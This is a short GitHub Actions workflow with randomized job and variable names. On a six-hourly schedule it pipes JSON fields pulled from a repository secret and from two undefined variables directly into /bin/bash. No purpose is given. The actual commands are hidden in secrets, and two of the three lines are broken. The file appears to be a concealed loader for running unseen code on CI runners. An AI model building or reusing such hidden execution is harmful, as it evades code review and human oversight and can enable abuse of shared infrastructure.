name: yangtianbao2001

on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangtianbao2001
        env:
          oazyp6135: ${{ secrets.oazyp6135 }}
        run: |
          echo $oazyp6135 | jq -r .etqgx7547 | /bin/bash
          echo $avfsa17 | jq -r .gr58218 | /bin/bash
          echo $trjbo29 | jq -r .sfk20 | /bin/bash

